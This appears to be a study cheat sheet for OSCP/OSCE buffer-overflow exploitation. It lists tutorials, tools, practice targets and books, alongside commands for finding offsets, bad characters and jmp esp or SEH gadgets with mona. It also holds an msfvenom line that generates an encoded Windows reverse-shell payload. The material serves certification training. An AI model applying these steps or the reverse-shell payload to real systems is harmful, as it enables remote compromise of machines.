OSCP/OSCE Buffer Overflows Exploitation
Tutorials / Methodologies
- https://github.com/gh0x0st/Buffer_Overflow
- https://infosecsanyam261.gitbook.io/tryharder/buffer-overflow
- https://blog.own.sh/introduction-to-network-protocol-fuzzing-buffer-overflow-exploitation/
- https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/
- https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/buffer-overflow
- https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
- https://eazeysec.com/BOF-Method/
- http://www.primalsecurity.net/tutorials/exploit-tutorials/
- http://www.fuzzysecurity.com/tutorials.html
- Jump to shellcode:
- https://www.abatchy.com/2017/05/jumping-to-shellcode.html
- https://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/
msf-pattern_create -l $length
msf-pattern_offset -l $length -q $EIP
import sys
badchars = ""
for x in range(1,256):
# sys.stdout.write("\\x" + '{:02x}'.format(x))
badchars += "\\x" + '{:02x}'.format(x)
badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# keep the same order of outputs
msf-nasm_shell
nasm > jmp esp
00000000 FFE4 jmp esp
# select a dll module
!mona modules
# find address of "jmp esp"
!mona find -s "\xff\xe4" -m "libspp.dll"
# find "pop,pop,ret" for SEH
!mona seh -m "$module"
# generate Windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f c -e x86/shikata_ga_nai -b "\x00"
Tools
-
Immunity Debugger: A powerful new way to write exploits, analyze malware, and reverse engineer binary files (whitepaper, course)
-
OllyDbg: A 32-bit assembler level analysing debugger for Microsoft Windows (tut)
-
Windbg: A kernel-mode and user-mode debugger that is included in Debugging Tools for Windows (tut)
-
edb: A Linux equivalent of the famous Olly debugger on the Windows platform.
-
Boofuzz: Network Protocol Fuzzing for Humans
-
mona: A Python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform) (tut, cheatsheet)
!mona findmsp !mona modules [ -o ]: (-o: only in the application which is more reliable) !mona jmp -r esp [ -o ] !mona seh !mona seh -m -o !mona bytearray -cpb "\x00" !mona compare -f c:\mona\pcmanftpd2\bytearray.bin -a 0012ED6C !mona find -s "\xff\xe4" -m "libspp.dll" !mona findmsp -
WinDBG: A kernel-mode and user-mode debugger that is included in Debugging Tools for Windows
Exploitation for Practice
- PWK 2020
- Vunlserver (github, tut, exploited functions, TRUN exploit)
- Easy File Sharing Web Server 7.2 (exploit, code, tut)
- Seattle Lab Mail (SLmail) 5.5 (python exploit, C exploit)
- Freefloat FTP Server 1.0 (exploit)
- MiniShare 1.4.1 (exploit)
- Savant Web Server 3.1 (exploit)
- WarFTP 1.65 (exploit)
- BigAnt Server 2.52 (exploit, tut)
- ASX to MP3 Converter 1.82.50 (exploit): tut
- Easy RM to MP3 Converter (exploit)
- Zip-n-Go 4.9 (exploit, FileFuzz)
- IDSECCONF 2013 myftpd challenge (tut-xp, tut-win7)
- QuickZip 4.x (exploit, tut1, tut2)
- Easy Chat Server 3.1 (tut)
- dostackbufferoverflowgood (exploit&tut)
- Vulnhub machines: Brainpan series, SmashTheTux: 1.0.1, Cyberry: 1, Pinky’s Palace series, Lord Of The Root: 1.0.1
Structured Exception Handler (SEH)
- Konica Minolta FTP Utility 1.00 (exploit, tut)
- Millenium MP3 Studio 2.0 (exploit, tut)
- IntraSRV 1.0 (exploit, tut)
- File Sharing Wizard 1.5.0 (exploit, tut)
More Targets
- https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice
- https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
- https://exploit.education/
- https://overthewire.org/wargames/narnia/
- Useful links: https://github.com/security-prince/PWK-OSCP-Preparation-Roadmap/blob/master/BOF
Advanced Topics for OSCE
- Windows drivers: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
- https://github.com/dhn/OSCE
- https://purpl3f0xsec.tech/2019/06/18/osce-prep-1.html
- Windows Exploitation Pathway
- https://github.com/epi052/OSCE-exam-practice
Books
- Hacking - The Art of Exploitation
- The Shellcoder’s Handbook: Discovering and Exploiting Security Holes
- Buffer Overflow Attacks: Detect, Exploit, Prevent
- Writing Security Tools and Exploits
- Penetration Testing with Shellcode: Detect, exploit, and secure network-level and operating system vulnerabilities
# From Kali, run first
~/OSCP/windows_buffer_overflows$ nc -l -p 1234 > VulnApp1.exe
# From Windows
C:\Tools\windows_buffer_overflows> nc -w 3 192.168.119.223 1234 < VulnApp1.exe
# Windows 10: Bridged Adapter network
# Kali: NAT network
- Download windows 10 x86 ISO: https://www.microsoft.com/en-gb/software-download/windows10ISO